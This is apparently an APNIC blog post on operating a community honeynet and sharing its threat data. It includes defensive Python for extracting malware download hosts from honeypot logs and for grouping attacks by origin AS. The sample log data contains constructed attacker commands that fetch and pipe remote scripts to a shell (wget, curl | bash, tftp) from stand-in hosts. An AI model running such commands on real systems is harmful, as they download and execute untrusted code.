I’ve been running honeynets since 2006, with a system deployed in MyCERT (one of the earliest Computer Emergency Response Teams (CERTs) in the region). APNIC is now operating a Community Honeynet Network (CHN) with more than 200 points of data collection, mostly in the Asia Pacific region but with nodes in Central and South America, the USA, and Europe.
What is a honeynet?
Before discussing honeynets, we have to talk about honeypots. Honeypots are simple systems set up to learn about attackers and to detect attacks. Typically they are systems with a restricted login that accepts weak passwords, or systems exposing well-known services such as file sharing, so that attackers can break in easily. At the same time they are isolated in a contained environment and heavily monitored. Because no legitimate user has any reason to connect to them, almost every connection they receive is suspicious by definition.
Honeypots are usually used as an intrusion detection tool. Many security researchers, including Computer Security Incident Response Teams (CSIRTs), deploy honeypots to learn about attackers’ tools, tactics, and infrastructure.
A honeynet is a system of honeypots that run cooperatively, so that the same attacks are observed from many vantage points at once and more data is collected about each of them.
Many types of honeypots can now be deployed, depending on the threats you want to monitor or track. They are no longer the simple systems of the 1990s. Instead of just presenting a login prompt, a honeypot can offer limited interaction and capture the commands executed after the login. That lets us capture the IP addresses or domain names attackers download malware from, and often a copy of the tools themselves that they plan to use once they have infected a system.
As well as the systems that detect intrusions and attacks, a honeynet has backend infrastructure to process logs, aggregate and store data, and present information about the threats seen.
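To make the capture-then-process step concrete, here is an added example (not APNIC’s code, and not the log format of any particular honeypot) of the kind of backend routine that turns captured post-login commands into a list of malware download hosts. The input is a few constructed JSON-lines records in a hypothetical format; the field names `session`, `src_ip`, `ts` and `cmd` are assumptions. It pulls URLs out of `wget`/`curl` style commands, handles the common `tftp -g -r FILE HOST` form that has no URL syntax, and classifies each host as a literal IP or a domain, which is the distinction that decides whether a blocklist entry or a DNS takedown request is the right follow-up.

```python
import ipaddress
import json
import re
from collections import defaultdict

# Constructed sample records in a hypothetical JSON-lines format: one object per
# command captured after a successful honeypot login. This is NOT any real
# honeypot's native log format; adapt the field names to the sensor you run.
SAMPLE_LOG = """\
{"session": "a1", "src_ip": "203.0.113.7", "ts": "2024-03-01T02:11:09Z", "cmd": "cd /tmp || cd /var/run; wget http://198.51.100.23/bins/arm7; chmod +x arm7; ./arm7"}
{"session": "a1", "src_ip": "203.0.113.7", "ts": "2024-03-01T02:11:12Z", "cmd": "busybox wget http://198.51.100.23/bins/mips -O- | sh"}
{"session": "b2", "src_ip": "192.0.2.44", "ts": "2024-03-01T02:30:41Z", "cmd": "curl -fsSL https://loader.example.net/install.sh | bash"}
{"session": "c3", "src_ip": "198.51.100.200", "ts": "2024-03-01T03:01:00Z", "cmd": "cat /proc/cpuinfo; uname -a"}
{"session": "d4", "src_ip": "203.0.113.7", "ts": "2024-03-01T03:45:10Z", "cmd": "tftp -g -r x86 198.51.100.23"}
"""

# Anything with a URL scheme: stop at whitespace and shell metacharacters so
# "wget http://h/x; chmod" does not swallow the rest of the command line.
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\";|&<>()]+", re.IGNORECASE)
# tftp has no URL syntax. This handles the common "tftp -g -r FILE HOST" form
# only; other argument orders (e.g. "tftp HOST -c get FILE") are not covered.
TFTP_RE = re.compile(r"\btftp\b[^;|&]*?-r\s+(\S+)[^;|&]*?\s(\d{1,3}(?:\.\d{1,3}){3})(?=\s|$)")


def host_of(url):
    """Return the host part of a URL: scheme and path stripped, userinfo and port removed."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    authority = authority.rsplit("@", 1)[-1]
    if authority.startswith("[") and "]" in authority:  # bracketed IPv6 literal
        return authority[1:authority.index("]")]
    return authority.split(":", 1)[0]


def classify(host):
    """'ip' if the host is a literal address (no DNS lookup involved), else 'domain'."""
    try:
        ipaddress.ip_address(host)
        return "ip"
    except ValueError:
        return "domain"


def extract_indicators(log_text):
    """Map each download host to its kind, the URLs seen, and the sessions/sources that used it."""
    found = defaultdict(lambda: {"kind": None, "urls": set(), "sessions": set(), "src_ips": set()})

    def note(host, url, rec):
        entry = found[host]
        entry["kind"] = classify(host)
        entry["urls"].add(url)
        entry["sessions"].add(rec["session"])
        entry["src_ips"].add(rec["src_ip"])

    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        cmd = rec["cmd"]
        for url in URL_RE.findall(cmd):
            note(host_of(url), url, rec)
        for filename, host in TFTP_RE.findall(cmd):
            note(host, f"tftp://{host}/{filename}", rec)
    return dict(found)


def report(indicators):
    """Flat rows for a feed: host, kind, sessions, distinct attacking sources, URL count."""
    rows = []
    for host, e in sorted(indicators.items(), key=lambda kv: (-len(kv[1]["sessions"]), kv[0])):
        rows.append((host, e["kind"], len(e["sessions"]), len(e["src_ips"]), len(e["urls"])))
    return rows


if __name__ == "__main__":
    for row in report(extract_indicators(SAMPLE_LOG)):
        print(*row, sep="\t")
```

On the constructed input the report lists `198.51.100.23` (an IP, three distinct payload URLs, used in two sessions by the same attacking source) ahead of `loader.example.net`; the session in which only reconnaissance commands ran contributes nothing, which is the correct outcome rather than an omission.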
How are honeynets being used?
Often, a honeypot or honeynet can be used to determine whether a specific attack is actually being seen in the wild. For example, Cisco recently announced a remote code execution vulnerability in the web frontend of some of their routers and switches. This led the CERT, CSIRT, and FIRST communities to ask whether attackers were really exploiting it. In response, they set up honeypots that mimic the vulnerable web interface and found active attacks ongoing. So it is now possible to show that a vulnerability that has been detected and listed as a threat is in fact being exploited.
CERTs and CSIRTs often respond to incidents on the basis of community reports. An alternative to this reactive approach is to deploy their own honeypots, which pick things up directly from the Internet. This way, CERTs and CSIRTs can work on mitigation ahead of large-scale issues.
Some threats are global, and some are local
Generally, the same kinds of address-scan attacks can be seen across the Internet. However, we do see certain attacks that only target particular IP blocks or Autonomous System Numbers (ASNs), perhaps because of the scanning algorithm of the malware. Or some threat actors may deliberately avoid IPs in certain economies because they don’t want to get in trouble with that government. You sometimes have to go quite deep into the analysis to figure that out.
How APNIC uses honeynet data
APNIC uses information from the honeynet in various ways. Most importantly, APNIC shares the feeds with various related projects, other groups collecting and coordinating threat information, which in turn share it with their stakeholders, typically network operators.
APNIC’s Dashboard for Autonomous System Health (DASH) is a good example of that coordination. DASH collates threats seen in the honeynet by the origin AS of APNIC Members, so Members can easily see if any of their IP addresses have hit our honeypots. A host that attacks a honeypot has almost certainly been compromised by, or is at least exposed to, one of the risks currently active on the Internet.
With DASH, and more broadly, curious Members can ask for additional insights, and APNIC can present and analyse all the information collected. The advice Members most often seek is on recommended next steps. Many engineers lack specialization in this area, which leads to a lack of confidence when dealing with the intricacies of malware, botnets, DDoS attacks, and cryptominers.
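The per-AS collation that DASH does, and the ‘is this attack seen everywhere or only in some address space?’ question from the section on global versus local threats, are both straightforward to reproduce on a small scale. The following is an added example, not DASH’s implementation or any APNIC code: it maps each attacking source to its origin AS by longest-prefix match over a constructed prefix table (in practice that table comes from a BGP RIB snapshot), aggregates hits per origin AS, and then flags attack types that not every sensor AS observed. All prefixes, ASNs and hit records are constructed from documentation and private-use ranges; the `sensor_asn`, `src_ip`, `attack_tag` tuple shape is an assumption about what a sensor records.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed prefix-to-origin-AS table. In practice this comes from a BGP RIB
# snapshot (route collectors) or a registry-derived dataset; the ASNs and
# prefixes here are documentation/private-use values, not real routes.
PREFIX_TABLE = [
    ("203.0.113.0/24", 64500),
    ("203.0.113.128/25", 64501),   # more-specific announced by a different AS
    ("198.51.100.0/24", 64502),
    ("192.0.2.0/24", 64503),
]

# Constructed honeypot hits as (sensor_asn, src_ip, attack_tag): the AS hosting
# the honeypot that recorded the hit, the attacking source, and a label for the
# attack type the sensor recognized.
HITS = [
    (64510, "203.0.113.7", "telnet-bruteforce"),
    (64510, "203.0.113.9", "telnet-bruteforce"),
    (64511, "203.0.113.200", "telnet-bruteforce"),
    (64512, "198.51.100.23", "telnet-bruteforce"),
    (64510, "198.51.100.77", "router-webui-rce"),
    (64510, "198.51.100.78", "router-webui-rce"),
    (64510, "192.0.2.44", "router-webui-rce"),
    (64511, "10.9.8.7", "telnet-bruteforce"),   # not in the table: origin unknown
]


def build_table(entries):
    """Parse prefixes and order them most-specific first so a linear scan is a longest-prefix match."""
    table = [(ipaddress.ip_network(prefix), asn) for prefix, asn in entries]
    table.sort(key=lambda item: item[0].prefixlen, reverse=True)
    return table


def origin_as(table, ip):
    """Longest-prefix match; None when the address is not covered by any entry."""
    addr = ipaddress.ip_address(ip)
    for net, asn in table:
        if addr.version == net.version and addr in net:
            return asn
    return None


def hits_by_origin_as(table, hits):
    """DASH-style view: per origin AS, hit count, distinct sources, and attack-type breakdown."""
    view = defaultdict(lambda: {"hits": 0, "sources": set(), "tags": Counter()})
    for _sensor, src, tag in hits:
        entry = view[origin_as(table, src)]
        entry["hits"] += 1
        entry["sources"].add(src)
        entry["tags"][tag] += 1
    return dict(view)


def unevenly_seen(hits):
    """Attack types not observed by every sensor AS, with the sensors that missed them.

    A tag seen only on some sensors is a candidate for targeted (or deliberately
    avoided) address space and deserves a closer look; it is a hint, not proof.
    """
    all_sensors = {sensor for sensor, _, _ in hits}
    seen = defaultdict(set)
    for sensor, _, tag in hits:
        seen[tag].add(sensor)
    return {tag: sorted(all_sensors - sensors)
            for tag, sensors in seen.items() if sensors != all_sensors}


if __name__ == "__main__":
    table = build_table(PREFIX_TABLE)
    view = hits_by_origin_as(table, HITS)
    for asn, entry in sorted(view.items(), key=lambda kv: (kv[0] is None, kv[0] or 0)):
        label = f"AS{asn}" if asn is not None else "unknown"
        print(label, entry["hits"], len(entry["sources"]), dict(entry["tags"]))
    print(unevenly_seen(HITS))
```

Two details matter in practice. The more-specific `/25` must win over the covering `/24`, otherwise a Member’s hits are reported to the wrong network; sorting by prefix length before scanning is what guarantees that. And sources that match no prefix are kept under an explicit `None` bucket rather than dropped, so unrouted or unregistered address space attacking your sensors stays visible instead of silently disappearing from the report.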
Taking it to the community
APNIC has increased public engagement at regional meetings and conferences to present this data. Because so much data is available, it is possible to engage consistently in discussions about what is observed within a specific economy or a particular origin AS.
This facilitates an in-depth exploration of diverse attack types, so discussions can be tailored to the audience’s interests. Topics can include attacker infrastructure, evolving techniques, and how rapidly attackers adapt when nobody intervenes and their activities carry no consequences for them.
Proactive engagement is crucial, as inaction encourages persistent malicious behaviour. Taking remedial measures and being proactive within the community can significantly mitigate the risk of large-scale and ongoing attacks.
In the last year, APNIC has engaged with the CSIRT and network operator communities, and with Law Enforcement Agencies (LEAs). LEAs typically seek information on threat actor behaviour. This serves an educational purpose, particularly for officers new to cybercrime investigation who may not have firsthand experience of a real attack. Datasets from honeynets therefore prove highly valuable for their initial training.
In our typical workshops, we establish the honeypot at the outset. Within an hour or two, data collection begins, providing attendees with real-time data to interact with, including packet capture (PCAP) files, log files, and perhaps some binaries uploaded to the system. This hands-on experience allows participants to genuinely immerse themselves in the dynamics of an attack.
How the APNIC Community Honeynet Project is resourced
Sometimes, investment may be funded by the APNIC Foundation. Hosting each node in interesting locations costs between AUD 5 and 10 per month. There is a large Elasticsearch instance for ingesting all of the datasets and a small server farm that manages log ingestion via Logstash.
For an individual honeypot host, a Raspberry Pi or equivalent single-board computer with Internet access can be a cheap option. The challenge for many individuals lies in the time required to process honeypot data. This is where investment in automation, and in additional systems for storage, processing and backup, becomes essential, and it is where the APNIC honeynet system excels.
Collaborating with organizations like the Shadowserver Foundation, we advocate for sharing this data beyond our regional scope, reaching areas like South America, Africa and Europe. This ensures broader dissemination of information, helping to secure the Internet more broadly.
The current threat landscape
The sad reality of the Internet threat landscape is that it is always dynamic, and historically the volume of attacks has never decreased. Certain types of attacks may subside for a week, two weeks, or even a month before resuming. This could be due to takedowns of command-and-control networks or the attackers taking a hiatus. Even after significant threat actors are arrested, their attacks can persist and their infrastructure can be passed on to others.
For a large economy like the USA, the issue becomes particularly significant because of the scale involved. Many adopt a reactive stance when facing a DDoS, not considering that attackers are recruiting new nodes for their attack infrastructure every single day. Identifying and eliminating those nodes early, before the actual attack occurs, is crucial. The challenge remains substantial even for smaller economies.
We see this in the island economies of Oceania, which may have only one ISP for an island or group of islands. In small island economies, 100 or more infected home routers is a significant problem. They may have only one very-small-aperture terminal (VSAT) link and one fibre link, and no security monitoring in place.
During such an event APNIC can help, and is known in the Pacific Islands because of this work. APNIC is committed to assisting the establishment of CERTs and CSIRTs in the region. The focus is on avoiding purely reactive measures while acknowledging the challenges related to resources, funding, and personnel.
APNIC can also help contextualize information shown in the media. At its most fundamental, this data can answer common questions such as ‘Are we under attack?’ and ‘Who is attacking us?’, and it can clarify the daily challenges people face. Having hands-on data is crucial for offering feedback in policy discussions, which benefits security. Having a honeynet node to provide this information is a win-win for everyone.
What’s the future for the honeynet and CERT programs?
Honeypots are attractive because they offer visibility into the problem. Without active monitoring, assumptions about the nature of an attack can lead to a false sense of security. Modern attacks, unlike traditional ones, may not simply freeze up a computer; an infected host often keeps working normally while it scans or attacks others. Detection requires vigilant observation and a clear understanding of what to look for.
There’s more work and engagement required to encourage uptake and increase the visibility of the current attack surfaces. In the future we hope to increase engagements for the smaller island economies such as Nauru and Tuvalu, to determine the most effective way for APNIC to support them.
2023 saw the inaugural FIRST Pacific symposium, where resources from across the globe were brought to the region to engage with the CERT and CSIRT community. Established CERTs in the Pacific have also contributed to this initiative.
Encouragingly, we’ve observed active engagement from experts within the broader CERT community, who have proactively reached out to ISPs, telcos, and LEAs, enabling these entities to play their part effectively.
Learning isn’t a one-way street. In the Pacific Islands, there’s a shared ethos of ‘this is a long journey, let’s do this together.’ Adopting this mindset can only benefit the broader security community.
The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.